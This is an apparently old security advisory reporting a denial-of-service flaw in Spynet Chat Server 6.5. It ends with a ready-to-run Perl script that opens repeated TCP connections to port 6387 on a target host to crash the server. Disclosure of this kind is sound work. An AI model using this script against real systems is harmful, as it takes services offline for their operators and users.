 [ Advisory for Spynet Chat                        ]
 [ Spynet Chat is made by Spytech                  ]
 [ Site: http://www.spytech-web.com                ]
 [ by nemesystm of the DHC                         ]
 [ (http://dhcorp.cjb.net - neme-dhc@hushmail.com) ]
 [ ADV-0120                                        ]

/-|=[explanation]=|-\
Spynet Chat is a chat server. It suffers from a
denial of service.

/-|=[who is vulnerable]=|-\
Spynet Chat 6.5
has been tested and was vulnerable. Prior versions
are assumed to be vulnerable as well.

/-|=[testing it]=|-\
By opening up roughly 100 sockets in Perl and then
using the normal Spynet Client to connect the
server crashes with:
S65server has caused an error in <unknown>.
S65server will now close.

I have made a perl script that exploits this. It is
at the bottom of this advisory.

/-|=[fix]=|-\
None known at the moment.

#!/usr/bin/perl
#
# SCS.PL - Crashes Spynet Chat Server 6.5.
# Written by nemesystm of the DHC
# http://dhcorp.cjb.net - neme-dhc@hushmail.com
#
####
use Socket;

die "$0 - Crashes Spynet Chat Server 6.5.
written by nemesystm of the DHC
http://dhcorp.cjb.net - neme-dhc\@hushmail.com
usage: perl $0 target.com\n" if !defined $ARGV[0];

use Socket;

for ($count = 0; $count <= 100; $count++) {
        $serverIP = inet_aton($ARGV[0]);
        $serverAddr = sockaddr_in(6387, $serverIP);
        socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
	if (connect (CLIENT, $serverAddr)) {
                send (CLIENT, "A",0);
                close (CLIENT);
        } else { die "Can't connect - if more than 0, this worked.\n"; }
}